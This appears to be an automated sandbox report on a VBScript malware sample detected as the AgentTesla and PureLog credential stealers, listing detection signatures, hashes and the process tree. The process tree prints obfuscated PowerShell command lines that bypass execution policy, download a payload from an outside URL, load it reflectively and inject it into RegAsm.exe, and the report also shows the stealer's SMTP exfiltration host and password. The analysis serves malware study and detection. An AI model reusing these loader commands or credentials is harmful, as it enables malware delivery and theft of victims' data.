Windows
Analysis Report
PofaABvatI.vbs
Overview
General Information
Field | Value |
---|---|
Sample name: | PofaABvatI.vbs (renamed because the original name is a hash value) |
Original sample name: | 05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7.vbs |
Analysis ID: | 1523820 |
MD5: | 5b4a21e35cce386f8692a4a5d684cb14 |
SHA1: | 38cefdde89a5577f3d89396afd6fc15c8f89200e |
SHA256: | 05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7 |
Tags: | BlindEagle, vbs, user-JAMESWT_MHT |
Detection
AgentTesla, PureLog Stealer
Field | Value |
---|---|
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number, etc.) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2216, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PofaABvatI.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 2952, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 blob omitted]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 2916, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3776, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL' +'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )", MD5: 04029E121A0CFA5991749937DD22A1D9)
- RegAsm.exe (PID: 4832, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 6080, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 516, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 4468, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- RegAsm.exe (PID: 6264, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET-based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. | | | |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.detarcoopmedical.com", "Username": "mail@detarcoopmedical.com", "Password": "To$zL%?nhDHN"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |